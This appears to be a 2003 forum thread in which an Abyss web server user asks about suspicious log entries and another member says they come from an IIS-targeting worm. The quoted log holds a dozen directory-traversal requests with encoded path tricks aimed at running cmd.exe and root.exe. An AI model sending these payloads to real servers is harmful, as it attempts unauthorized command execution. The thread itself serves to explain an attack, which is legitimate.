FAQ  |  Search  |  Register  |  Profile  |  Log in to check your private messages  |  Log in
Help needed on explanation log-file

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
Butch Glaser
-


Joined: 24 Nov 2003
Posts: 2
PostPosted: Fri Dec 26, 2003 9:20 pm    Post subject: Help needed on explanation log-file Reply with quote
Hello,

I installed a couple days ago the Abyss web server and it seems to work OK.
I checked the log file and found the below entries.

Can somebody explain these entries in the log file and moreover tell me if somebody broke succesful in into my system?

Thanks for a response.

Butch Slager

Part from log file>>>>>>>>>>
62.141.249.232 - - [26/Dec/2003:01:10:39 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:40 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:41 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:42 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:42 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:43 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 268 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:47 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:48 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:53 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
62.141.249.232 - - [26/Dec/2003:01:10:57 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266 "" ""
<<<<<<<<<<<<<End of logfile.
Back to top View user's profile Send private message
Axis
-


Joined: 29 Sep 2003
Posts: 336
PostPosted: Fri Dec 26, 2003 10:59 pm    Post subject: Reply with quote
Hi Butch--

Those are the footprints of either the Code Red virus or the sadmind/IIS virus. An infected machine visited your site. You are using abyss, so you are not vulnerable to these viruses (they have been around for some time...even most Frontpage sites are now patched for this.)

It is incredible how long some people will go with a virus infected machine before they figure it out.

Regards,
Axis
Back to top View user's profile Send private message
Butch Glaser
-


Joined: 24 Nov 2003
Posts: 2
PostPosted: Fri Dec 26, 2003 11:40 pm    Post subject: Reply with quote
Hello Axis,

Thanks for your response.
Good to know that knowbody succesfully broke into my system.

regards,

Butch Slager
Back to top View user's profile Send private message
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group